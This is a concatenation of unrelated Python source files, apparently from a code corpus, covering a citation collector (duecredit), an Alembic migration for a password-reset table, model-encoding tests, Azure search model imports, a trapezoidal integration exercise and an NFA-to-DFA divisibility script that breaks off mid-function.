              by the authors of the paper) of the cited method
            - "another-implementation" tag describes some other implementation of the method
            - "use" tag points to publications demonstrating a worthwhile noting use
              the method
            - "edu" references to tutorials, textbooks and other materials useful to learn
              more
            - "donate" should be commonly used with Url entries to point to the websites
              describing how to contribute some funds to the referenced project
        """
        if path is None:
            raise ValueError('Must specify path')
        self._entry = entry
        self._description = description
        # We might want extract all the relevant functionality into a separate class
        self._path = path
        self._cite_module = cite_module
        # The default is a tuple and the provided sequence is copied: the
        # previous list default (tags=['implementation'] with
        # self.tags = tags or []) was shared across instances, so mutating
        # one citation's tags silently changed the default for all later
        # citations. Explicit None/empty still yields [].
        self.tags = list(tags) if tags else []
        self.version = version
        self.count = 0

    def __repr__(self):
        args = [repr(self._entry)]
        if self._description:
            args.append("description={0}".format(repr(self._description)))
        if self._path:
            args.append("path={0}".format(repr(self._path)))
        if self._cite_module:
            args.append("cite_module={0}".format(repr(self._cite_module)))
        if args:
            args = ", ".join(args)
        else:
            args = ""
        return self.__class__.__name__ + '({0})'.format(args)

    @property
    def path(self):
        return self._path

    @property
    def cite_module(self):
        return self._cite_module

    @path.setter
    def path(self, path):
        # TODO: verify value, if we are not up for it -- just make _path public
        self._path = path

    @property
    def entry(self):
        return self._entry

    @property
    def description(self):
        return self._description

    @property
    def cites_module(self):
        """True if the citation targets a whole module (no ":" in path)."""
        if not self.path:
            return None
        return not (':' in self.path)

    @property
    def module(self):
        """Module part of the path (everything before the first ":")."""
        if not self.path:
            return None
        return self.path.split(':', 1)[0]

    @property
    def package(self):
        """Top-level package of the module path."""
        module = self.module
        if not module:
            return None
        return module.split('.', 1)[0]

    @property
    def objname(self):
        """Object part of the path (everything after ":"), or None."""
        if not self.path:
            return None
        spl = self.path.split(':', 1)
        if len(spl) > 1:
            return spl[1]
        else:
            return None

    def __contains__(self, entry):
        """Checks if provided entry 'contained' in this one given its path

        If current entry is associated with a module, contained will be an entry
        of
        - the same module
        - submodule of the current module or function within

        If current entry is associated with a specific function/class, it can contain
        another entry if it really contains it as an attribute
        """
        if self.cites_module:
            return ((self.path == entry.path) or
                    (entry.path.startswith(self.path + '.')) or
                    (entry.path.startswith(self.path + ':')))
        else:
            return entry.path.startswith(self.path + '.')

    @property
    def key(self):
        # (path, entry key) pair used to index citations in the collector
        return CitationKey(self.path, self.entry.key)

    @staticmethod
    def get_key(path, entry_key):
        return CitationKey(path, entry_key)

    def set_entry(self, newentry):
        self._entry = newentry
class DueCreditCollector(object):
"""Collect the references
The mighty beast which will might become later a proxy on the way to
talk to a real collector
Parameters
----------
entries : list of DueCreditEntry, optional
List of reference items (BibTeX, Doi, etc) known to the collector
citations : list of Citation, optional
List of citations -- associations between references and particular
code, with a description for its use, tags etc
"""
# TODO? rename "entries" to "references"? or "references" is closer to "citations"
def __init__(self, entries=None, citations=None):
self._entries = entries or {}
self.citations = citations or {}
@never_fail
def add(self, entry):
"""entry should be a DueCreditEntry object"""
if isinstance(entry, list):
for e in entry:
self.add(e)
else:
key = entry.get_key()
self._entries[key] = entry
lgr.log(1, "Collector added entry %s", key)
@never_fail
def load(self, src):
"""Loads references from a file or other recognizable source
ATM supported only
- .bib files
"""
# raise NotImplementedError
if isinstance(src, str):
if src.endswith('.bib'):
self._load_bib(src)
else:
raise NotImplementedError('Format not yet supported')
else:
raise ValueError('Must be a string')
def _load_bib(self, src):
lgr.debug("Loading %s" % src)
# # TODO: figure out what would be the optimal use for the __call__
# def __call__(self, *args, **kwargs):
# # TODO: how to determine and cite originating module???
# # - we could use inspect but many people complain
# # that it might not work with other Python
# # implementations
# pass # raise NotImplementedError
@never_fail
@borrowdoc(Citation, "__init__")
def cite(self, entry, **kwargs):
# TODO: if cite is invoked but no path is provided -- we must figure it out
# I guess from traceback, otherwise how would we know later to associate it
# with modules???
path = kwargs.get('path', None)
if path is None:
raise ValueError('path must be provided')
if isinstance(entry, DueCreditEntry):
# new one -- add it
self.add(entry)
entry_ = self._entries[entry.get_key()]
else:
entry_ = self._entries[entry]
entry_key = entry_.get_key()
citation_key = Citation.get_key(path=path, entry_key=entry_key)
try:
citation = self.citations[citation_key]
except KeyError:
self.citations[citation_key] = citation = Citation(entry_, **kwargs)
assert(citation.key == citation_key)
# update citation count
citation.count += 1
# TODO: theoretically version shouldn't differ if we don't preload previous results
if not citation.version:
version = kwargs.get('version', None)
if not version and citation.path:
modname = citation.path.split('.', 1)[0]
if '.' in modname:
package = modname.split('.', 1)[0]
else:
package = modname
# package_loaded = sys.modules.get(package)
# if package_loaded:
# # find the citation for that module
# for citation in itervalues(self.citations):
# if citation.package == package \
# and not citation.version:
version = external_versions[package]
citation.version = version
return citation
def _citations_fromentrykey(self):
"""Return a dictionary with the current citations indexed by the entry key"""
citations_key = dict()
for (path, entry_key), citation in iteritems(self.citations):
if entry_key not in citations_key:
citations_key[entry_key] = citation
return citations_key
@staticmethod
def _args_match_conditions(conditions, *fargs, **fkwargs):
    """Helper to identify when to trigger citation given parameters to the function call

    ``conditions`` maps ``(argpos, kwarg_name)`` tuples to a set of accepted
    values.  Returns True only if every condition is satisfied by the actual
    call arguments in ``fargs``/``fkwargs``.
    """
    for (argpos, kwarg), values in iteritems(conditions):
        # main logic -- assess default and if get to the next one if
        # given argument is not present
        if not ((len(fargs) > argpos) or (kwarg in fkwargs)):
            if not ('DC_DEFAULT' in values):
                # if value was specified but not provided and not default
                # conditions are not satisfied
                return False
            # argument absent but its default value is acceptable
            continue
        # "extract" the value. Must be defined here
        value = "__duecredit_magical_undefined__"
        if len(fargs) > argpos:
            value = fargs[argpos]
        if kwarg in fkwargs:
            # the keyword spelling wins over the positional one
            value = fkwargs[kwarg]
        assert(value != "__duecredit_magical_undefined__")
        if '.' in kwarg:
            # we were requested to condition based on the value of the attribute
            # of the value. So get to the attribute(s) value
            for attr in kwarg.split('.')[1:]:
                value = getattr(value, attr)
        # Value is present but not matching
        if not (value in values):
            return False
    # if checks passed -- we must have matched conditions
    return True
@never_fail
@borrowdoc(Citation, "__init__", replace="PLUGDOCSTRING")
def dcite(self, *args, **kwargs):
    """Decorator for references. PLUGDOCSTRING

    Parameters
    ----------
    conditions: dict, optional
      If reference should be cited whenever parameters to the function call
      satisfy given values (all of the specified).
      Each key in the dictionary is a 2 element tuple with first element, integer,
      pointing to a position of the argument in the original function call signature,
      while second provides the name, thus if used as a keyword argument.
      Use "DC_DEFAULT" keyword as a value to depict default value (e.g. if no
      explicit value was provided for that positional or keyword argument).
      If "keyword argument" is of the form "obj.attr1.attr2", then actual value
      for comparison would be taken by extracting attr1 (and then attr2) attributes
      from the provided value. So, if desired to condition of the state of the object,
      you can use `(0, "self.attr1") : {...values...}`

    Examples
    --------
    >>> from duecredit import due
    >>> @due.dcite('XXX00', description="Provides an answer for meaningless existence")
    ... def purpose_of_life():
    ...     return None

    Conditional citation given argument to the function

    >>> @due.dcite('XXX00', description="Relief through the movement",
    ...            conditions={(1, 'method'): {'purge', 'DC_DEFAULT'}})
    ... @due.dcite('XXX01', description="Relief through the drug treatment",
    ...            conditions={(1, 'method'): {'drug'}})
    ... def relief(x, method='purge'):
    ...     if method == 'purge': return "crap"
    ...     elif method == 'drug': return "swallow"
    >>> relief("doesn't matter")
    'crap'

    Conditional based on the state of the object

    >>> class Citeable(object):
    ...     def __init__(self, param=None):
    ...         self.param = param
    ...     @due.dcite('XXX00', description="The same good old relief",
    ...                conditions={(0, 'self.param'): {'magic'}})
    ...     def __call__(self, data):
    ...         return sum(data)
    >>> Citeable('magic')([1, 2])
    3
    """
    def func_wrapper(func):
        # per-decoration configuration; `conditions` must not leak into cite()
        conditions = kwargs.pop('conditions', {})
        path = kwargs.get('path', None)
        if not path:
            # deduce path from the actual function which was decorated
            # TODO: must include class name but can't !!!???
            modname = func.__module__
            path = kwargs['path'] = '%s:%s' % (modname, func.__name__)
        else:
            # TODO: we indeed need to separate path logic outside
            modname = path.split(':', 1)[0]
        # if decorated function was invoked, it means that we need
        # to cite that even if it is a module. But do not override
        # value if user explicitly stated
        if 'cite_module' not in kwargs:
            kwargs['cite_module'] = True
        # TODO: might make use of inspect.getmro
        # see e.g.
        # http://stackoverflow.com/questions/961048/get-class-that-defined-method
        lgr.debug("Decorating func %s within module %s" % (func.__name__, modname))
        # TODO: unittest for all the __version__ madness
        # TODO: check if we better use wrapt module which provides superior "correctness"
        #       of decorating. vcrpy uses wrapt, and that thing seems to wrap
        @wraps(func)
        def cite_wrapper(*fargs, **fkwargs):
            # cite on every call, but never let citation failures break
            # the wrapped function itself
            try:
                if not conditions \
                        or self._args_match_conditions(conditions, *fargs, **fkwargs):
                    citation = self.cite(*args, **kwargs)
            except Exception as e:
                lgr.warning("Failed to cite due to %s" % (e,))
            return func(*fargs, **fkwargs)
        # keep a handle on the undecorated function for introspection
        cite_wrapper.__duecredited__ = func
        return cite_wrapper
    return func_wrapper
@never_fail
def __repr__(self):
    """Debug representation listing any stored citations and entries."""
    parts = []
    if self.citations:
        parts.append("citations={0}".format(repr(self.citations)))
    if self._entries:
        parts.append("entries={0}".format(repr(self._entries)))
    body = ", ".join(parts) if parts else ""
    return self.__class__.__name__ + '({0})'.format(body)
@never_fail
def __str__(self):
    """One-line human-readable summary with entry and citation counts."""
    summary = ' {0:d} entries, {1:d} citations'.format(
        len(self._entries), len(self.citations))
    return self.__class__.__name__ + summary
# TODO: redo heavily -- got very messy
class CollectorSummary(object):
    """A helper which would take care about exporting citations upon its Death
    """
    def __init__(self, collector, outputs="stdout,pickle", fn=DUECREDIT_FILE):
        # collector whose citations will be dumped
        self._due = collector
        self.fn = fn
        # for now decide on output "format" right here
        # the DUECREDIT_OUTPUTS environment variable overrides `outputs`
        self._outputs = [
            self._get_output_handler(
                type_.lower().strip(), collector, fn=fn)
            for type_ in os.environ.get('DUECREDIT_OUTPUTS', outputs).split(',')
            if type_
        ]

    @staticmethod
    def _get_output_handler(type_, collector, fn=None):
        # just a little factory
        if type_ in ("stdout", "stderr"):
            return TextOutput(getattr(sys, type_), collector)
        elif type_ == "pickle":
            return PickleOutput(collector, fn=fn)
        else:
            raise NotImplementedError()

    def dump(self):
        # flush every configured output
        for output in self._outputs:
            output.dump()
# TODO: provide HTML, MD, RST etc formattings
| StarcoderdataPython |
6489861 | <reponame>Xrenya/algorithms
digit = input()
def digit_sum(digit):
    """Return the sum of the decimal digits in the string ``digit``.

    Uses a generator expression instead of materializing an intermediate
    list just to sum it.
    """
    return sum(int(ch) for ch in digit)
print(digit_sum(digit))
| StarcoderdataPython |
5060142 | """Add new table for PasswordReset model.
Revision ID: 32839e658194
Revises: <PASSWORD>
Create Date: 2017-11-13 08:12:28.990037
"""
from __future__ import absolute_import, division, print_function, unicode_literals
import sqlalchemy as sa
from alembic import op
# Revision identifiers, used by Alembic.
revision = '32839e658194'
down_revision = '<PASSWORD>'
branch_labels = None
depends_on = None
def upgrade():
    """Create 'password_resets' table."""
    op.create_table(
        'password_resets',
        sa.Column('id', sa.Integer(), nullable=False),
        # nullable: a reset row may outlive/lack its user
        sa.Column('user_id', sa.Integer(), nullable=True),
        sa.Column('code', sa.String(length=32), nullable=False),
        sa.Column('is_active', sa.Boolean(), nullable=False),
        sa.Column('expires_at', sa.DateTime(), nullable=False),
        sa.Column('modified_at', sa.DateTime(), nullable=True),
        sa.Column('created_at', sa.DateTime(), nullable=False),
        # each reset belongs to at most one user
        sa.ForeignKeyConstraint(['user_id'], ['users.id'], ),
        sa.PrimaryKeyConstraint('id'),
        # codes are looked up directly, so they must be unique
        sa.UniqueConstraint('code')
    )
def downgrade():
    """Drop 'password_resets' table."""
    op.drop_table('password_resets')
| StarcoderdataPython |
5139881 | <reponame>metabolize-forks/booby<gh_stars>0
# -*- coding: utf-8 -*-
from expects import *
from booby import fields, models
# Sentinel fixture values -- the exact contents are irrelevant to the specs,
# only equality between input and output matters.
IRRELEVANT_NAME = 'irrelevant name'
IRRELEVANT_EMAIL = 'irrelevant email'
ENCODED_IRRELEVANT_NAME = 'encoded irrelevant name'
ENCODED_IRRELEVANT_EMAIL = 'encoded irrelevant email'
IRRELEVANT_DATE = 'irrelevant date'
class TestEncodeModel(object):
    """Behavioural specs for Model.encode()."""

    def test_should_use_value_returned_by_field_encode_method(self):
        # encode() must delegate per-field serialization to Field.encode
        class User(models.Model):
            name = StubField(encoded=ENCODED_IRRELEVANT_NAME)
            email = StubField(encoded=ENCODED_IRRELEVANT_EMAIL)
        user = User(name=IRRELEVANT_NAME, email=IRRELEVANT_EMAIL)
        result = user.encode()
        expect(result).to(have_keys(name=ENCODED_IRRELEVANT_NAME,
                                    email=ENCODED_IRRELEVANT_EMAIL))

    def test_should_return_dict_with_model_mapped_fields(self):
        # fields with an explicit `name` are emitted under that mapped name
        class User(models.Model):
            name = fields.Field(name='username')
            email = fields.Field(name='emailAddress')
        user = User(name=IRRELEVANT_NAME, email=IRRELEVANT_EMAIL)
        result = user.encode()
        expect(result).to(have_keys(username=IRRELEVANT_NAME,
                                    emailAddress=IRRELEVANT_EMAIL))

    def test_should_skip_read_only_field(self):
        # read_only fields must never be serialized
        class User(models.Model):
            name = fields.Field()
            last_update = fields.Field(read_only=True)
        user = User(name=IRRELEVANT_NAME, last_update=IRRELEVANT_DATE)
        result = user.encode()
        expect(result).to(have_keys(name=IRRELEVANT_NAME))
        expect(result).not_to(have_keys(last_update=IRRELEVANT_DATE))
class StubField(fields.Field):
    """Test double whose encode() ignores the value and returns the
    pre-canned ``encoded`` option instead."""
    def encode(self, value):
        return self.options['encoded']
| StarcoderdataPython |
1826416 | <reponame>rsdoherty/azure-sdk-for-python<filename>sdk/cognitiveservices/azure-cognitiveservices-search-websearch/azure/cognitiveservices/search/websearch/models/__init__.py
# coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
#
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
# --------------------------------------------------------------------------
try:
from ._models_py3 import Answer
from ._models_py3 import Article
from ._models_py3 import Computation
from ._models_py3 import CreativeWork
from ._models_py3 import Error
from ._models_py3 import ErrorResponse, ErrorResponseException
from ._models_py3 import Identifiable
from ._models_py3 import ImageObject
from ._models_py3 import Images
from ._models_py3 import Intangible
from ._models_py3 import MediaObject
from ._models_py3 import News
from ._models_py3 import NewsArticle
from ._models_py3 import Places
from ._models_py3 import Query
from ._models_py3 import QueryContext
from ._models_py3 import RankingRankingGroup
from ._models_py3 import RankingRankingItem
from ._models_py3 import RankingRankingResponse
from ._models_py3 import RelatedSearchesRelatedSearchAnswer
from ._models_py3 import Response
from ._models_py3 import ResponseBase
from ._models_py3 import SearchResponse
from ._models_py3 import SearchResultsAnswer
from ._models_py3 import SpellSuggestions
from ._models_py3 import StructuredValue
from ._models_py3 import Thing
from ._models_py3 import TimeZone
from ._models_py3 import TimeZoneTimeZoneInformation
from ._models_py3 import VideoObject
from ._models_py3 import Videos
from ._models_py3 import WebMetaTag
from ._models_py3 import WebPage
from ._models_py3 import WebWebAnswer
from ._models_py3 import WebWebGrouping
except (SyntaxError, ImportError):
from ._models import Answer
from ._models import Article
from ._models import Computation
from ._models import CreativeWork
from ._models import Error
from ._models import ErrorResponse, ErrorResponseException
from ._models import Identifiable
from ._models import ImageObject
from ._models import Images
from ._models import Intangible
from ._models import MediaObject
from ._models import News
from ._models import NewsArticle
from ._models import Places
from ._models import Query
from ._models import QueryContext
from ._models import RankingRankingGroup
from ._models import RankingRankingItem
from ._models import RankingRankingResponse
from ._models import RelatedSearchesRelatedSearchAnswer
from ._models import Response
from ._models import ResponseBase
from ._models import SearchResponse
from ._models import SearchResultsAnswer
from ._models import SpellSuggestions
from ._models import StructuredValue
from ._models import Thing
from ._models import TimeZone
from ._models import TimeZoneTimeZoneInformation
from ._models import VideoObject
from ._models import Videos
from ._models import WebMetaTag
from ._models import WebPage
from ._models import WebWebAnswer
from ._models import WebWebGrouping
from ._web_search_client_enums import (
AnswerType,
ErrorCode,
ErrorSubCode,
Freshness,
SafeSearch,
TextFormat,
)
__all__ = [
'Answer',
'Article',
'Computation',
'CreativeWork',
'Error',
'ErrorResponse', 'ErrorResponseException',
'Identifiable',
'ImageObject',
'Images',
'Intangible',
'MediaObject',
'News',
'NewsArticle',
'Places',
'Query',
'QueryContext',
'RankingRankingGroup',
'RankingRankingItem',
'RankingRankingResponse',
'RelatedSearchesRelatedSearchAnswer',
'Response',
'ResponseBase',
'SearchResponse',
'SearchResultsAnswer',
'SpellSuggestions',
'StructuredValue',
'Thing',
'TimeZone',
'TimeZoneTimeZoneInformation',
'VideoObject',
'Videos',
'WebMetaTag',
'WebPage',
'WebWebAnswer',
'WebWebGrouping',
'AnswerType',
'ErrorCode',
'ErrorSubCode',
'Freshness',
'SafeSearch',
'TextFormat',
]
| StarcoderdataPython |
11344022 | # Exercise 3.17
# Author: <NAME>
from scipy.integrate import quad
from scipy import exp, pi, cos, log, sqrt
def diff2(f, x, h=1E-6):
    """Approximate the second derivative of f at x with the central
    difference formula (f(x-h) - 2 f(x) + f(x+h)) / h**2."""
    central = f(x - h) - 2 * f(x) + f(x + h)
    return central / (h ** 2)
def adaptive_trapezint(f, a, b, eps=1E-4):
    """Integrate f over [a, b] with the trapezoidal rule, choosing the step
    from the standard error bound so the error is roughly bounded by eps.

    Fixes vs. the original:
    - ZeroDivisionError when the sampled second derivative is zero
      everywhere (e.g. a linear integrand): fall back to a fixed grid.
    - (b - a) / 100 used integer division under Python 2 for int limits,
      sampling f'' at a single point; forced to float division.
    - n was truncated and h left unchanged, so the grid stopped short of b;
      n is now rounded and h recomputed so the grid spans [a, b] exactly.
    """
    # Sample |f''| on a uniform 101-point grid to estimate worst curvature.
    max_ddf = max(abs(diff2(f, a + i * (b - a) / 100.0)) for i in range(101))
    if max_ddf > 0:
        # h from the trapezoid error bound: E ~ (b-a) h^2 max|f''| / 12 <= eps
        h = sqrt(12 * eps) / sqrt((b - a) * max_ddf)
        n = max(int(round((b - a) / h)), 1)
    else:
        # No curvature detected on the sample grid -- assume (near-)linear f
        # and use a modest fixed resolution instead of dividing by zero.
        n = 100
    h = (b - a) / float(n)  # recompute so the grid covers [a, b] exactly
    s = (f(a) + f(b)) / 2.0
    for i in range(1, n):
        s += f(a + i * h)
    return s * h
# Test integrands as (function, lower limit, upper limit) triples.
f1 = [exp, 0, log(3)]
f2 = (cos, 0, pi)
functions = [f1, f2]
def verify(f, a, b, n):
    """Compare adaptive_trapezint against scipy's quad on [a, b] and print
    the absolute error.

    ``n`` is accepted for interface compatibility but is not used.
    The Python-2-only ``print`` statement was converted into a
    single-argument ``print(...)`` call that behaves identically under
    both Python 2 and 3.
    """
    exact = quad(f, a, b)[0]
    approx = adaptive_trapezint(f, a, b)
    error = abs(exact - approx)
    print('The exact integral of %s between %.5f and %.5f is %.5f. '
          'The approximate answer is %.5f giving an error of %.5f'
          % (f.__name__, a, b, exact, approx, error))
# Exercise each (function, a, b) test case; the final argument is unused
# by verify() but kept for its signature.
for f in functions:
    verify(f[0], f[1], f[2], 10)
"""
Sample run:
python adaptive_trapezint.py
The exact integral of exp between 0.00000 and 1.09861 is 2.00000. The approximate answer is 1.96771 giving an error of 0.03229
The exact integral of cos between 0.00000 and 3.14159 is 0.00000. The approximate answer is 0.01467 giving an error of 0.01467
"""
| StarcoderdataPython |
9767394 | import sys
from random import randrange, uniform
from collections import OrderedDict as od
def visitNFA(table, input_, accepting_states):
    """Simulate the NFA described by ``table`` on the symbol sequence
    ``input_`` and return True iff any state in ``accepting_states`` is
    active after consuming the whole input.

    ``table[state][symbol]`` is the list of successor states.

    Bug fix: the original built the initial activity list one element too
    long (``[1] + [0] * number_of_states``); the spurious trailing slot was
    always 0 and therefore harmless, but the length is now correct.
    """
    number_of_states = len(table)
    # Start with only state 0 active.
    active = [0] * number_of_states
    active[0] = 1
    for char in input_:
        nxt = [0] * number_of_states
        for state, is_active in enumerate(active):
            if is_active:
                for target in table[state][char]:
                    nxt[target] = 1
        active = nxt
    return any(active[s] for s in accepting_states)
def createArray(alphabet, n):
    """Build the transition table of the mod-n divisibility DFA over base-10
    digits: state r on digit d goes to (10*r + d) % n.  Each cell is a
    singleton list so the table doubles as an NFA row."""
    table = []
    for remainder in range(n):
        row = []
        for letter in alphabet:
            row.append([(remainder * 10 + letter) % n])
        table.append(row)
    return table
def makeNFA(dfa_1, dfa_2):
    """Glue two copies of the divisibility DFA into one NFA that models
    'optionally skip exactly one digit': every transition of the first copy
    also nondeterministically jumps into the corresponding state of the
    second copy (offset by ``next_state_value``).

    Returns (nfa, accepting_states).

    NOTE(review): ``dfa_1`` is mutated in place (its cells get the extra
    successor appended) -- callers must not reuse it afterwards.
    """
    # possible accepting state because the second dfa accepts at this state, as it is the first state for the second dfa
    next_state_value = len(dfa_1)
    nfa = [0] * next_state_value
    for state, next_state_sets in enumerate(dfa_1):
        nfa[state] = next_state_sets
        for i, next_states in enumerate(next_state_sets):
            # add the 'skip this digit' jump into the second copy
            nfa[state][i].append(state + next_state_value)
    new_dfa = [0] * next_state_value
    for state, next_state_sets in enumerate(dfa_2):
        new_dfa[state] = []
        for i, next_states in enumerate(next_state_sets):
            # second copy: same transitions, states shifted by the offset
            new_dfa[state].append([dfa_2[state][i][0] + next_state_value])
    for state, next_state_sets in enumerate(new_dfa):
        nfa.append(next_state_sets)
    return nfa, [next_state_value, 0]
def makeDFAs(alphabet, n):
    """Return two independent copies of the mod-n divisibility DFA.
    Two distinct objects on purpose: makeNFA mutates the first in place."""
    first = createArray(alphabet, n)
    second = createArray(alphabet, n)
    return first, second
def convertToList(number_as_string):
    """Turn a string of digits into the corresponding list of ints."""
    return list(map(int, number_as_string))
# Accepts exactly the strings the NFA rejects: True means `string` is
# strongly NOT divisible by n.
def stronglyNotDivisible(nfa, string, accepting_states):
    """Negation wrapper around visitNFA."""
    accepted = visitNFA(nfa, string, accepting_states)
    return not accepted
def checkGoodValues(irand, mod_val):
    """Monte-Carlo probe: keep drawing random integers until one divisible
    by mod_val is found for which at least 50 single-digit deletions remain
    divisible, then stop.

    NOTE(review): diagnostic scaffolding -- it returns nothing, the counter
    ``j`` is incremented but never read, and termination is only via the
    ``break``.
    """
    j = 0
    while True:
        if irand % mod_val == 0:
            string_test = str(irand)
            strings = []
            for i, a in enumerate(string_test):
                # drop the i-th digit and test divisibility of the remainder
                if int(string_test[0:i] + string_test[i+1:]) % mod_val == 0:
                    strings.append(string_test[0:i] + string_test[i+1:])
            if len(strings) >= 50:
                break
        # try another random candidate (up to 77 digits)
        irand = randrange(0, 10000000000000000000000000000000000000000000000000000000000000000000000000000)
        j += 1
def checkBadValues(irand, mod_val):
    """Counterpart of checkGoodValues for NON-divisible random integers.

    NOTE(review): terminates the interpreter via exit() after 5 draws, and
    the collected ``strings`` list is never used -- leftover scaffolding.
    """
    j = 0
    while True:
        if j == 5:
            exit()
        if irand % mod_val != 0:
            string_test = str(irand)
            strings = []
            for i, a in enumerate(string_test):
                # drop the i-th digit and test NON-divisibility of the rest
                if int(string_test[0:i] + string_test[i+1:]) % mod_val != 0:
                    strings.append(string_test[0:i] + string_test[i+1:])
        irand = randrange(0, 10000000000000000000000000000000000000000000000000000000000000000000000000000)
        j += 1
def makeStrongDivisibleKIsFourDigits(k):
    """Return, as a string, the smallest positive multiple of k that is
    "strongly divisible" by k: the number itself and every number obtained
    by deleting exactly one digit are all divisible by k.

    Bug fixes vs. the original:
    - the inner divisibility test referenced the undefined name ``mod_val``
      (NameError on first use); it now uses ``k``;
    - deleting the only digit of a 1-digit candidate produced ``int('')``
      (ValueError); an empty deletion now counts as divisible (empty ~ 0);
      TODO confirm this convention against the intended definition;
    - the loop only advanced the candidate in the (unreachable) else branch
      of ``possible_value % k == 0`` -- since scalar*k is always divisible,
      a failed strong check hung forever; the candidate now always advances.
    """
    scalar = 1
    while True:
        possible_value = scalar * k
        string_test = str(possible_value)
        strings = []
        for i in range(len(string_test)):
            sub = string_test[:i] + string_test[i+1:]
            # empty deletion result counts as 0, which divides evenly
            if sub == '' or int(sub) % k == 0:
                strings.append(sub)
        if len(strings) == len(string_test):
            return string_test
        scalar += 1
import copy
def currentStates(current_state):
    """Decode a combo-state name like '1_4_7' into its component NFA
    states [1, 4, 7]; a plain '5' decodes to [5]."""
    parts = current_state.split('_')
    return [int(part) for part in parts]
def nextStates(A, col, current_states):
    """Union of NFA successor states for input column ``col`` starting
    from every state in ``current_states``."""
    successors = set()
    for state in current_states:
        successors.update(A[state][col])
    return successors
def nextComboState(A, combo_state):
    """One subset-construction step: for each input column, produce the
    (source combo-state name, destination combo-state name) pair, with
    destination components sorted and '_'-joined.

    NOTE(review): the column loop iterates over ``A[0][0]`` -- the successor
    *list of one cell* -- rather than ``A[0]`` (the row, one cell per input
    symbol), so it visits only as many columns as that first cell has
    successors.  This looks like a latent bug, but downstream code is built
    around the current behaviour; confirm against the NFA layout produced
    by makeNFA before changing it.
    """
    next_combo_states = []
    for col, next_states in enumerate(A[0][0]):
        # decode the 'a_b_c' name into its component NFA states
        current_states = currentStates(combo_state)
        # union of successors over all component states for this column
        current_col = nextStates(A, col, current_states)
        next_combo_states.append(('_'.join([str(j) for j in current_states]),
                                  '_'.join([str(i) for i in sorted(copy.deepcopy(current_col))])))
    return next_combo_states
def makeRow(B, combo_state, A, next_combo_states):
    """Extract the destination combo-state name from each (src, dest) pair.
    ``B``, ``combo_state`` and ``A`` are unused but kept for interface
    compatibility with existing callers."""
    return [dest for _, dest in next_combo_states]
def addAcceptingStatesToF(current_combo_state, F, combo_state, accepting_states):
    """Add ``current_combo_state`` to the accepting set ``F`` when any
    component NFA state encoded in ``combo_state`` is accepting; return F."""
    components = [int(token) for token in combo_state.split('_')]
    if any(component in accepting_states for component in components):
        F.add(current_combo_state)
    return F
def appendNextComboStates(unadded_states, next_combo_states):
    """Extend the expansion frontier with the destination name of every
    (src, dest) pair; returns the same (mutated) list."""
    unadded_states.extend(dest for _, dest in next_combo_states)
    return unadded_states
def convertNFAToDFA(A, accepting_states):
    """Subset construction: determinize NFA ``A`` starting from state '0'.

    Returns (B, F): B is an OrderedDict mapping combo-state name -> row of
    destination combo-state names (in discovery order), F is the set of
    accepting combo-state names.
    """
    unadded_states = ['0']      # frontier of combo states still to expand
    F = set()                   # accepting combo states discovered so far
    B = od([])                  # transition table, keyed in discovery order
    while unadded_states != []:
        combo_state = unadded_states[0]
        del unadded_states[0]
        next_combo_states = nextComboState(A, combo_state)
        # canonical (sorted/joined) name for the state just expanded
        current_combo_state = next_combo_states[0][0]
        # accepting iff any component NFA state is accepting
        F = addAcceptingStatesToF(current_combo_state, F, combo_state, accepting_states)
        B[combo_state] = makeRow(B, combo_state, A, next_combo_states)
        unadded_states = appendNextComboStates(unadded_states, next_combo_states)
        # drop from the frontier anything that was already expanded
        x = set(unadded_states)
        y = set(B.keys())
        if list(x & y) != []:
            unadded_states = list(x - y)
    return B, F
def testing(F):
counter = 0
for i in F:
if '7' in i.split('_'):
counter += 1
return counter
def convertToProperllyConvertedDFA(dfa, f, dictionary):
    """Renumber a name-keyed DFA into a plain integer-indexed table.

    ``dfa`` maps combo-state name -> row of destination names, ``f`` is the
    iterable of accepting names, and ``dictionary`` maps each name to its
    integer index.  Returns (new_dfa, new_F).

    Cleanup vs. the original: the unused ``enumerate`` index and a
    commented-out debug print were removed.
    """
    new_dfa = [[dictionary[next_state] for next_state in dfa[key]]
               for key in dfa]
    new_F = [dictionary[key] for key in f]
    return new_dfa, new_F
def Pop(queue):
    """Remove and return the front element of the queue.
    (O(n) on a plain list; fine for the small queues used here.)"""
    return queue.pop(0)
def Push(queue, item):
    """Append item at the back of the queue and return the queue
    (fluent style, matching how bfs() uses it)."""
    queue += [item]
    return queue
# example: 9 is not strongly divisible by 7
def bfs(state_transition_table, start_state, alphabet, accepting_states, n):
    """Breadth-first search over an integer-indexed DFA for the smallest
    n-digit input reaching an accepting state, returning that digit string
    via recover(), or the string 'none' when no such input exists.

    NOTE(review): ``i``/``j`` implement level (digit-count) tracking, but
    ``j`` is incremented once per *scanned edge* rather than per *enqueued
    node*, so ``level_counter`` over-counts frontier sizes -- confirm the
    level bookkeeping against expected outputs.  Also note the list
    comprehension below reuses the name ``i``; this is only safe because
    Python 3 comprehensions have their own scope.
    """
    # map column index -> input symbol (digit)
    edge_input = {i:letter for i, letter in enumerate(alphabet)}
    visited = [0] * len(state_transition_table)
    # predecessor links: state -> (previous state, input symbol used)
    sequences_found_so_far = [(-1, -1)] * len(state_transition_table)
    queue = []
    visited[start_state] = 1
    queue = Push(queue, start_state)
    level_counter = 0
    i = 1   # nodes remaining in the current BFS level
    j = 0   # counter feeding the next level's size (see NOTE above)
    while (queue != []):
        current_remainder = Pop(queue)
        next_remainders = [(edge_input[i], NextRemainder) for i, NextRemainder in enumerate(state_transition_table[current_remainder])]
        for y in next_remainders:
            (letter, next_remainder) = y
            if visited[next_remainder] == 0:
                visited[next_remainder] = 1
                sequences_found_so_far[next_remainder] = (current_remainder, letter)
                queue = Push(queue, next_remainder)
            j += 1
            # 0 is an accepting state
            if next_remainder in accepting_states and level_counter == n:
                sequences_found_so_far[next_remainder] = (current_remainder, letter)
                return recover(sequences_found_so_far, next_remainder, n)
        i -= 1
        if i == 0:
            # finished a BFS level: one more digit consumed
            level_counter += 1
            i = j
            j = 0
    return 'none'
def recover(sequences_found_so_far, next_remainder, length):
    """Walk the predecessor links backwards from ``next_remainder`` and
    rebuild the ``length``-digit input string, most significant digit
    first."""
    digits = []
    state = next_remainder
    # first hop happens unconditionally, then length-1 more
    state, symbol = sequences_found_so_far[state]
    digits.append(str(symbol))
    remaining = length - 1
    while remaining > 0:
